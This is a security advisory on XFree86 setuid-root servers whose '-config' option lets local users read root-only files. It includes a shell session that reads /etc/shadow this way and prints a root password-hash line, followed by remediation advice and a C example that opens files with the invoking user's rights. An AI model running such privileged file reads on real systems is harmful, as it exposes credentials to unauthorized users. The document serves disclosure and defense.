COMMAND
XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
SYSTEMS AFFECTED
Systems running XFree86 3.3.1, 3.2.9 and 3.1.2 (other versions as
well)
PROBLEM
Nicolas Dubee found the following "feature" in all default XFree86
servers. The servers let you specify an alternate configuration
file with -config and do not check whether you have the right to
read it. Because the servers are installed setuid root, any user
can read files with root permissions. Here it is:
Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/fr-latin1.map
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a # mouse acceleration (pixels)
-ac disable access control restrictions
-audit int set audit trail level
-auth file select authorization file
-bc enable bug compatibility
-bs disable any backing store support
-c turns off key-click
... and so on. HINT: look at the first XF86_SVGA output line: the
"Unrecognized option" message contains the first line of
/etc/shadow. It seems that this affects any platform using X11R6
XC/TOG code where the Xserver is installed setuid root (although
on non-XFree86 platforms you may need to be a little more
inventive with the use of the -config option).
SOLUTION
If you run xdm, you should consider removing the setuid bit of the
servers. If not, wait for the XFree86 Project to bring you a
patch.
The fix is to disable the '-config' Xserver option. The option
will be removed in the next release, and also in the next X11
release from The Open Group. It was only added to get around
problems on OSes with small command line length limits, and should
never have been enabled for most Unix-like OSes.
Note also that Debian Linux is clean as the X servers aren't
setuid root.
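
The missing check described under PROBLEM, as an added example (not
XFree86 code and not the fix the project chose, which is to disable
-config): a setuid-root program opening a user-named file with the
invoking user's rights. The helper name open_as_invoker is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper, written for this example. Returns an fd, or -1
 * with errno set. The effective uid/gid are switched to the real ones
 * only for the open(), so the kernel applies the invoking user's
 * permissions to the path. This avoids the race of an access() check
 * followed by a privileged open(), where the path can be swapped in
 * between the two calls. */
int open_as_invoker(const char *path)
{
    uid_t saved_uid = geteuid();
    gid_t saved_gid = getegid();
    int fd, err;

    /* Drop the group first: changing egid may need the privileged euid. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        err = errno;
        (void)setegid(saved_gid);
        errno = err;
        return -1;
    }

    fd = open(path, O_RDONLY);
    err = errno;

    /* Regain privileges; never continue in a half-dropped state. */
    if (seteuid(saved_uid) != 0 || setegid(saved_gid) != 0) {
        if (fd >= 0) close(fd);
        _exit(1);
    }
    errno = err;
    return fd;
}

int main(int argc, char **argv)
{
    int fd = open_as_invoker(argc > 1 ? argv[1] : "/etc/shadow");
    if (fd < 0) { perror("config file"); return 1; }
    puts("readable by the invoking user");
    close(fd);
    return 0;
}
```

Installed setuid root and run by an ordinary user against a mode 0600
root-owned file, this fails with "Permission denied" instead of reading
the file.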